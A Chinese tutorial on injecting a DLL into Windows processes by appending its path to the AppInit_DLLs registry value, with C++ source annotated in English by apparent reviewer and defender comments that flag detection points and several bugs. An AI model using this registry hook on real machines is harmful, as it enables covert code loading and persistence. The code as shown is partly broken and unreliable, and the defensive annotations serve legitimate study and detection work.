动态库注入--注册表注入

  • 利用注册表注入就是在特定的键值下写入动态库的路径,

     SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

      注册表注入的原理是:在 Windows 系统中,当上述注册表键下的键值中存在 DLL 文件路径时,系统会在 EXE 文件启动时加载该路径所指向的 DLL 文件。如果有多个 DLL 文件,需要用逗号或者空格隔开各个 DLL 文件的路径。

  • 实现流程

    其实现流程也就是操作注册表。

  • 代码实现
      1 // RegInject.cpp : 定义控制台应用程序的入口点。
      2 //
      3 
      4 #include "stdafx.h"
      5 #include <Windows.h>
      6 #include <iostream>
      7 using namespace std;
      8 wstring GetExeDirectory();
      9 wstring GetParent(const std::wstring& FullPath);
// Entry point. Appends the full path of Dll.dll (resolved next to this
// executable by GetExeDirectory()) to the REG_SZ value AppInit_DLLs under
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, then writes the
// DWORD value LoadAppInit_DLLs in the same key.
//
// Defender's note: AppInit_DLLs is a documented Windows mechanism for loading
// extra DLLs into processes and a classic persistence / injection channel, so
// the two RegSetValueEx calls below are the observable events. Registry
// auditing or EDR rules that watch writes to AppInit_DLLs and LoadAppInit_DLLs
// under this key see this program (and anything like it) at the moment of the
// write, before any process loads the DLL.
//
// Returns 0 on the success path. The early-exit paths return FALSE, which is
// also 0, so the exit code does not tell the caller whether anything was
// written.
int main()
{

    
    LONG ReturnValue = 0;
    // Opened below; never released with RegCloseKey on any path (the OS
    // reclaims it at process exit).
    HKEY hKey;
    // NOTE(review): "\ " (backslash-space) is not a standard escape sequence.
    // MSVC reports C4129 and keeps the space, so the literal reads
    // "...\Windows NT\..."; confirm on the toolchain in use.
    WCHAR  RegPath[] = L"SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Windows";
    const wchar_t* DllName = L"Dll.dll";
    wstring InjectFileFullPath;
    // <directory of this .exe>\Dll.dll — the DLL is expected to sit beside
    // the executable.
    InjectFileFullPath = GetExeDirectory() +
        L"\\" + DllName;
    // Return value ignored. NOTE(review): this is invoked on the predefined
    // HKLM root handle rather than on an opened key; whether it has any
    // effect here is not established by this code.
    RegEnableReflectionKey(HKEY_LOCAL_MACHINE);
    // Open the key. Full access to an HKLM key normally requires an elevated
    // process; an unelevated run fails here and returns.
    ReturnValue = RegOpenKeyEx(
        HKEY_LOCAL_MACHINE,
        RegPath,
        0,
        KEY_ALL_ACCESS,
        &hKey);
    
    if (ReturnValue != ERROR_SUCCESS)
    {
        return FALSE;
    }

    // Read the current AppInit_DLLs value so the new path is appended to the
    // existing list rather than replacing it.
    DWORD dwReadType;
    // NOTE(review): passed to RegQueryValueEx without being initialised. The
    // API reads it on input as the size of the destination buffer, so the
    // size it sees here is indeterminate.
    DWORD dwReadCount;
    WCHAR szReadBuff[1000] = { 0 };
    ReturnValue = RegQueryValueEx(hKey,
        L"AppInit_DLLs",
        NULL,
        &dwReadType,
        (BYTE*)&szReadBuff,
        &dwReadCount);

    if (ReturnValue != ERROR_SUCCESS)
    {
        return FALSE;
    }
    // Intended as "skip the write if the DLL path is already in the value".
    // As written the condition is true for every non-zero find() result,
    // including npos (not found), so main returns FALSE unless the path sits
    // at offset 0 of the existing value. `a` is unused and narrows size_t to
    // int.
    wstring strCmpBuff(szReadBuff);
    //strCmpBuff = szReadBuff;
    int a = strCmpBuff.find(InjectFileFullPath);
    if (strCmpBuff.find(InjectFileFullPath))
    {
        return FALSE;
    }

    // Add a separating space unless the existing value is exactly " ". An
    // empty value therefore receives a leading space.
    if (wcscmp(szReadBuff, L" ") != 0)
    {
        wcscat_s(szReadBuff, L" ");
    }

    // wcscat_s is bounded by the 1000-WCHAR capacity of szReadBuff; on
    // overflow it invokes the invalid-parameter handler rather than writing
    // past the array.
    wcscat_s(szReadBuff, InjectFileFullPath.c_str());

    // Write the merged list back to the registry. _tcslen/TCHAR resolve to
    // wcslen/wchar_t only when _UNICODE is defined; the rest of this block
    // (L"" literals, WCHAR buffer) assumes a Unicode build, so the byte count
    // is consistent under that assumption.
    ReturnValue = RegSetValueEx(hKey,
        L"AppInit_DLLs",
        0,
        REG_SZ,
        (CONST BYTE*)szReadBuff,
        (_tcslen(szReadBuff) + 1) * sizeof(TCHAR));
    // Writes DWORD 0 to LoadAppInit_DLLs, the switch Windows consults before
    // honouring AppInit_DLLs at all. Any modification of this value outside
    // installation tooling is a strong monitoring signal. The results of
    // both RegSetValueEx calls are discarded, so a failed write is
    // indistinguishable from success.
    DWORD v1 = 0;
    ReturnValue = RegSetValueEx(hKey,
        L"LoadAppInit_DLLs",
        0,
        REG_DWORD,
        (CONST BYTE*)&v1,
        sizeof(DWORD));
    return 0;
}
     83 
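// Returns the directory that contains the running executable (the image's own
// path with its last component removed, via GetParent()).
//
// Returns an empty string when the path cannot be retrieved or does not fit in
// MAX_PATH: GetModuleFileName returns 0 on failure and returns the buffer
// size when the path was truncated, and neither result is a usable path. The
// original ignored the return value and would have silently parented a
// truncated path.
std::wstring GetExeDirectory()
{
    wchar_t ProcessFullPath[MAX_PATH] = { 0 };
    const DWORD BufferLength = ARRAYSIZE(ProcessFullPath);
    const DWORD Copied = GetModuleFileName(NULL, ProcessFullPath, BufferLength);
    // 0 => call failed; >= BufferLength => truncated (and on older systems
    // possibly not NUL-terminated). Bail out rather than use a partial path.
    if (Copied == 0 || Copied >= BufferLength)
    {
        return std::wstring();
    }
    return GetParent(ProcessFullPath);
}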
     92 
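// Returns FullPath with its last path component removed, i.e. the parent
// directory. Both '\\' and '/' count as separators.
//
// @param FullPath  Path to strip; may be empty.
// @return The text before the last separator of either kind; FullPath itself
//         when it is empty or contains no separator. A trailing separator is
//         simply removed ("C:\dir\" -> "C:\dir").
std::wstring GetParent(const std::wstring& FullPath)
{
    if (FullPath.empty())
    {
        return FullPath;
    }
    // The parent ends at the LAST separator of either kind, so a mixed path
    // such as C:\a\b/c yields C:\a\b. (The previous version only looked for
    // '/' when the path contained no '\\' at all, which cut C:\a\b/c at
    // C:\a.)
    const std::wstring::size_type Cut = FullPath.find_last_of(L"\\/");
    if (Cut == std::wstring::npos)
    {
        return FullPath;
    }
    return FullPath.substr(0, Cut);
}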

     
